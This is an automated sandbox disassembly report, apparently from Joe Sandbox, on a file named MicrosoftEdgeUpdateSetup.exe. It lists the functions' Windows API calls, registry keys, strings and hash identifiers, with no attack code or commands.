                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CloseHandleProcess$CodeCreateErrorExitInfoLastObjectSingleStartupWait
                                        • String ID:
                                        • API String ID: 2373000011-0
                                        • Opcode ID: 555496e5f0daa49efd6645f64ed50d199881cac66bdaf708bd6fe7c12da3f2cf
                                        • Instruction ID: bad108057dd98686fd416e0cd3dfec7c48c4ffdadab658115b7dd2473e1c1598
                                        • Opcode Fuzzy Hash: 555496e5f0daa49efd6645f64ed50d199881cac66bdaf708bd6fe7c12da3f2cf
                                        • Instruction Fuzzy Hash: FE314A7190020DEFEB009FE4DC899AEBBBCFF04349B108529E526E7161DB309D96DB90
                                        Function 00162F46 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00162F80
                                        • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\EdgeUpdate,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,?), ref: 00162FFE
                                        • RegSetValueExW.ADVAPI32(?,WindowsUpdateVersion,00000000,00000001,?,00000007,?,?), ref: 00163022
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 0016302E
                                        Strings
                                        • SOFTWARE\Microsoft\EdgeUpdate, xrefs: 00162FF4
                                        • WindowsUpdateVersion, xrefs: 00163017
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CloseCreateFileModuleNameValue
                                        • String ID: SOFTWARE\Microsoft\EdgeUpdate$WindowsUpdateVersion
                                        • API String ID: 506456306-3665867204
                                        • Opcode ID: 35ebc2f5a95b1d8e2386e8edaf7853d4dc7a805bf5ae2fc76cda6ff42e25b47e
                                        • Instruction ID: 6e13898b77337226e4a71c9d2850ad91daaf466f7dbb54487d215569e1061e82
                                        • Opcode Fuzzy Hash: 35ebc2f5a95b1d8e2386e8edaf7853d4dc7a805bf5ae2fc76cda6ff42e25b47e
                                        • Instruction Fuzzy Hash: 41212EB494125CEBDB319B11DC8DEEBBBBCEBA1700F100599B419A2191DB705B95CF90
                                        Function 00171215 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: api-ms-$ext-ms-
                                        • API String ID: 0-537541572
                                        • Opcode ID: 869105cc204e0330582d101843dd48d07b9e7d51092037e8bf77bd82cd860bf1
                                        • Instruction ID: c96757a281f50af1b1ca430e7f9a54326fd3555eb907b5f5aba11c61721fa43c
                                        • Opcode Fuzzy Hash: 869105cc204e0330582d101843dd48d07b9e7d51092037e8bf77bd82cd860bf1
                                        • Instruction Fuzzy Hash: 1321B772A05210FBDB214B7CDC41A6E77B99B55BA0F358524ED0DF7292D730DD4086E0
                                        Function 00162EA5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\EdgeUpdate,00000000,00000000,00000000,00000003,00000000,?,00000000), ref: 00162ECD
                                        • RegQueryValueExA.ADVAPI32(?,WindowsUpdateAttempts,00000000,?,?,?), ref: 00162EF5
                                        • RegSetValueExA.ADVAPI32(?,WindowsUpdateAttempts,00000000,00000004,?,00000004), ref: 00162F25
                                        • RegCloseKey.ADVAPI32(?), ref: 00162F2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: Value$CloseCreateQuery
                                        • String ID: SOFTWARE\Microsoft\EdgeUpdate$WindowsUpdateAttempts
                                        • API String ID: 409396109-566685349
                                        • Opcode ID: 551e1eec6dace7166d95700d4e85f01dab9e1471ec0c8a80c2b105c689eec2c5
                                        • Instruction ID: 34c63f0d89ec927e6f8b4770ab6ea6eda4ce5564f3ae02482e6e599214542659
                                        • Opcode Fuzzy Hash: 551e1eec6dace7166d95700d4e85f01dab9e1471ec0c8a80c2b105c689eec2c5
                                        • Instruction Fuzzy Hash: C41107B5A00118BADB21DF96DC49DEFBFBCEF45765F2041AAF505E2150E7309A80CBA0
                                        Function 001708DB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 001708A3: _free.LIBCMT ref: 001708C8
                                        • _free.LIBCMT ref: 00170929
                                          • Part of subcall function 0016ED43: HeapFree.KERNEL32(00000000,00000000,?,0016BFBC), ref: 0016ED59
                                          • Part of subcall function 0016ED43: GetLastError.KERNEL32(?,?,0016BFBC), ref: 0016ED6B
                                        • _free.LIBCMT ref: 00170934
                                        • _free.LIBCMT ref: 0017093F
                                        • _free.LIBCMT ref: 00170993
                                        • _free.LIBCMT ref: 0017099E
                                        • _free.LIBCMT ref: 001709A9
                                        • _free.LIBCMT ref: 001709B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 7f908c188f808f8a59cf2ad3ecd6800bc9683a3060747447433c65fb15b6aded
                                        • Instruction ID: 84fdeca5a74749d6602368883ebe0b0788a51348ed6846fabd29004ebc7bb973
                                        • Opcode Fuzzy Hash: 7f908c188f808f8a59cf2ad3ecd6800bc9683a3060747447433c65fb15b6aded
                                        • Instruction Fuzzy Hash: 301181B1941B04EAE622B7F0CC0BFCB77EC5F28700F448815B2DD6A452DB24B7554791
                                        Function 0017B902 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0017B97D,0017BB26), ref: 0017B919
                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0017B92F
                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0017B944
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                        • API String ID: 667068680-1718035505
                                        • Opcode ID: 7e4d1f43a28ec225a45490f93c488e6dc6ff2e07e077270af26f851c5679dc38
                                        • Instruction ID: 4170e69d8b5ae14baa837fd91761060933952d761eb3fa7c25783193db7a99cc
                                        • Opcode Fuzzy Hash: 7e4d1f43a28ec225a45490f93c488e6dc6ff2e07e077270af26f851c5679dc38
                                        • Instruction Fuzzy Hash: 36F0A4B2A4C312EB8B215FA15CC537662F8BB02358315813DDF29D2A90D710C982A791
                                        Function 00173DF5 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleOutputCP.KERNEL32(?,?,?), ref: 00173E3D
                                        • __fassign.LIBCMT ref: 00174022
                                        • __fassign.LIBCMT ref: 0017403F
                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00174087
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001740C7
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0017416F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                        • String ID:
                                        • API String ID: 1735259414-0
                                        • Opcode ID: a73162a9fc6ea22c78d33093eb5d673d7227b08b48950175f69ab45ee1852bee
                                        • Instruction ID: 68724999a876eaeca44e9f572d98f5f28242a6130e03b9505290d28b37634a94
                                        • Opcode Fuzzy Hash: a73162a9fc6ea22c78d33093eb5d673d7227b08b48950175f69ab45ee1852bee
                                        • Instruction Fuzzy Hash: B4C19171D042589FCB15CFA8D8809EDBBB5AF19314F28816AE859F7241D731AE46CB60
                                        Function 0016943A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00169431,001690FC,00168954), ref: 00169448
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00169456
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0016946F
                                        • SetLastError.KERNEL32(00000000,00169431,001690FC,00168954), ref: 001694C1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 86fb850bd089642dd40f8949ecdffa03b8af777df2e10ca40769f8548358fc7d
                                        • Instruction ID: e1f4f88b5966959f1528cf063499365b547c74c8e3f3576bed69652b5272eceb
                                        • Opcode Fuzzy Hash: 86fb850bd089642dd40f8949ecdffa03b8af777df2e10ca40769f8548358fc7d
                                        • Instruction Fuzzy Hash: AC0142722183119FAB252BB5BCC567A3BACEF25774B300239F414956F1EF314CA29788
                                        Function 00164340 Relevance: 9.0, APIs: 6, Instructions: 49synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?), ref: 00164369
                                        • SetEvent.KERNEL32(00000000), ref: 00164383
                                        • WaitForSingleObject.KERNEL32(?), ref: 0016438D
                                        • GetCurrentProcess.KERNEL32 ref: 001643A0
                                        • TerminateProcess.KERNEL32(00000000,?), ref: 001643A8
                                        • ReleaseMutex.KERNEL32(?), ref: 001643B3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ObjectProcessSingleWait$CurrentEventMutexReleaseTerminate
                                        • String ID:
                                        • API String ID: 1298389381-0
                                        • Opcode ID: dd38cf8502d3df8e0a9119793b61c64e764198d6dbf53e7a85f89d3186ee5ad6
                                        • Instruction ID: 1d0cf8c258086c394650e9ddd5c4f6c6eb23beee65146c91424ba46ee2cdb43a
                                        • Opcode Fuzzy Hash: dd38cf8502d3df8e0a9119793b61c64e764198d6dbf53e7a85f89d3186ee5ad6
                                        • Instruction Fuzzy Hash: 45011731200610EFDB355FA5EC0CB6ABBF5FF64361B14493DE09AC2A61DB30A994DB90
                                        Function 0016F5B2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Strings
                                        • C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe, xrefs: 0016F5B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: C:\Users\user\Desktop\MicrosoftEdgeUpdateSetup.exe
                                        • API String ID: 0-2543340943
                                        • Opcode ID: 97619ba139bda80f91944e482cdcce207caff7303b347fde25d1edbf3a13483e
                                        • Instruction ID: d09786149c708987c9cb1cf332d4ba323228f80d32c0de9b28a6c39e90ebeac2
                                        • Opcode Fuzzy Hash: 97619ba139bda80f91944e482cdcce207caff7303b347fde25d1edbf3a13483e
                                        • Instruction Fuzzy Hash: 45219271604206BFDB20AF75EC85D7B77ADAF103A87114639F81997161EB31DC628BA0
                                        Function 00165DE6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSecurityDescriptorGroup.ADVAPI32(00000000,?,001663B7,00000220,?,001833B4,?,001663B7,?,?,?,00000220,?,?,?,00000220), ref: 00165E1A
                                          • Part of subcall function 0016540A: GetLastError.KERNEL32(00165668,?,00165503,?), ref: 0016540A
                                          • Part of subcall function 0016C27B: _free.LIBCMT ref: 0016C28E
                                        • CopySid.ADVAPI32(001663B7,00000000,001663B3,?,001833B4), ref: 00165E66
                                        • SetSecurityDescriptorGroup.ADVAPI32(00000000,00000000,00000000,?,001833B4), ref: 00165E76
                                        • GetLengthSid.ADVAPI32(001663B3,00000220,?,001833B4), ref: 00165E44
                                          • Part of subcall function 00165FE0: GetSecurityDescriptorControl.ADVAPI32(00000000,?,?,00000000), ref: 0016600E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: DescriptorSecurity$Group$ControlCopyErrorLastLength_free
                                        • String ID: Global\EdgeUpdate
                                        • API String ID: 925420052-2301841735
                                        • Opcode ID: e924da00558a72efca58bf9ebaafa66e2db57e51214c1bb8b55db4dc43608d92
                                        • Instruction ID: 721bb49acecdb1927da1cc22a364a9386dc22a97f767802319c2bc27f2441e67
                                        • Opcode Fuzzy Hash: e924da00558a72efca58bf9ebaafa66e2db57e51214c1bb8b55db4dc43608d92
                                        • Instruction Fuzzy Hash: F121C031900A04EBDF14ABB4DD45BAFB7BAAF50741F10406EF406A2151EF759AA4C7A0
                                        Function 001626C9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(kernelbase.dll,00000000,00000800,00000000), ref: 001626FC
                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0016270C
                                        • GetTempPathW.KERNEL32(00000104,00000000,00000104), ref: 00162747
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadPathProcTemp
                                        • String ID: GetTempPath2W$kernelbase.dll
                                        • API String ID: 1686214323-1418961652
                                        • Opcode ID: 3ac16b48155c9e4e51fd63b02b26426a6ec6eb53f5709d61ae2b6bfaeb3d7796
                                        • Instruction ID: 5a64ac86909a512694001770eefa34ffa2d3dcd83a7ce80253b1aaef982f60f8
                                        • Opcode Fuzzy Hash: 3ac16b48155c9e4e51fd63b02b26426a6ec6eb53f5709d61ae2b6bfaeb3d7796
                                        • Instruction Fuzzy Hash: 39216271A00508BBCB04EFA5DC56DEE7B78AF65350B4001A9F412A7281DF349B99CBA4
                                        Function 001695C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00169686,?,?,00186CB8,00000000,?,001697B1,00000004,InitializeCriticalSectionEx,0017CF88,InitializeCriticalSectionEx,00000000), ref: 00169654
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: api-ms-
                                        • API String ID: 3664257935-2084034818
                                        • Opcode ID: a48649554e705b9114e1c171e10732c3dfe836617d3b5b1d95e74a8fcd475a70
                                        • Instruction ID: 22144045de415db370c28358d42feb2dd5c03ad49e21ea730dd594fb51680825
                                        • Opcode Fuzzy Hash: a48649554e705b9114e1c171e10732c3dfe836617d3b5b1d95e74a8fcd475a70
                                        • Instruction Fuzzy Hash: 0811E571A01320EBDF229B68DC41B5E77ACAF05B70F210225F905E72C0D770ED5086E5
                                        Function 00161938 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCommandLineW.KERNEL32(?,WUZP,00000000,brand=), ref: 0016197A
                                        • CommandLineToArgvW.SHELL32(00000000), ref: 00161981
                                        • LocalFree.KERNEL32(00000000), ref: 001619B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CommandLine$ArgvFreeLocal
                                        • String ID: WUZP$brand=
                                        • API String ID: 1415666456-2996017382
                                        • Opcode ID: ffd01bb9a1346117f68f43455dedc170995cdba8a3836ceff6e0b738a4ef3135
                                        • Instruction ID: f3935c7c4a14e804e2b13ae6e3b76e86e62999cebfaed2ddee83b21659026633
                                        • Opcode Fuzzy Hash: ffd01bb9a1346117f68f43455dedc170995cdba8a3836ceff6e0b738a4ef3135
                                        • Instruction Fuzzy Hash: 71117071E00218FFCB10EFB5DC458AEBBB9FF55310B4404AAE416E7251DB306A85DB90
                                        Function 0016BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0016BA62,?,?,0016BA2A,?,?,?), ref: 0016BAC5
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0016BAD8
                                        • FreeLibrary.KERNEL32(00000000,?,?,0016BA62,?,?,0016BA2A,?,?,?), ref: 0016BAFB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: eac1698a0be05fbf70c4fc84ef4e9ec81d0a70eb66f507e1eb367e2c9d192713
                                        • Instruction ID: 0612f66a88bcc024b11c49dbad7d4661a091c526264150dec76fb2c462103ec9
                                        • Opcode Fuzzy Hash: eac1698a0be05fbf70c4fc84ef4e9ec81d0a70eb66f507e1eb367e2c9d192713
                                        • Instruction Fuzzy Hash: 9EF0A030A40229FBCB119BA1EC0ABDEBB79EF40755F108064F809E21A0CB708E81DBD0
                                        Function 001640E0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSecurityDescriptorControl.ADVAPI32(00000000,00000000,?,?,?,001640C1,?,?,80070057,?,00000000,?), ref: 0016410E
                                        • GetSecurityDescriptorGroup.ADVAPI32(00000000,001640C1,?,?,?,001640C1,?,?,80070057,?,00000000,?), ref: 0016414C
                                        • GetSecurityDescriptorDacl.ADVAPI32(00000000,80070057,?,?,?,?,001640C1,?,?,80070057,?,00000000,?), ref: 0016416A
                                        • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,?,?,?,?,001640C1,?), ref: 0016418E
                                        • GetSecurityDescriptorOwner.ADVAPI32(00000000,?,?,?,?,001640C1,?,?,80070057,?,00000000,?), ref: 00164132
                                          • Part of subcall function 0016C27B: _free.LIBCMT ref: 0016C28E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: DescriptorSecurity$ControlDaclGroupOwnerSacl_free
                                        • String ID:
                                        • API String ID: 62099665-0
                                        • Opcode ID: fb50c5cdf846764a938091f3a586343bfb62607f6776740539eb8f56f7d469ee
                                        • Instruction ID: 2b8bfcba5efa568fb9f29b5cb87ed2dff6a0a531e001fed4e7a301808531e92f
                                        • Opcode Fuzzy Hash: fb50c5cdf846764a938091f3a586343bfb62607f6776740539eb8f56f7d469ee
                                        • Instruction Fuzzy Hash: 1021C372800108EBDB129BD0DD45AFFB7B9FF19700F10456AE556A2460DB30AA99DBA0
                                        Function 0017083A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00170852
                                          • Part of subcall function 0016ED43: HeapFree.KERNEL32(00000000,00000000,?,0016BFBC), ref: 0016ED59
                                          • Part of subcall function 0016ED43: GetLastError.KERNEL32(?,?,0016BFBC), ref: 0016ED6B
                                        • _free.LIBCMT ref: 00170864
                                        • _free.LIBCMT ref: 00170876
                                        • _free.LIBCMT ref: 00170888
                                        • _free.LIBCMT ref: 0017089A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
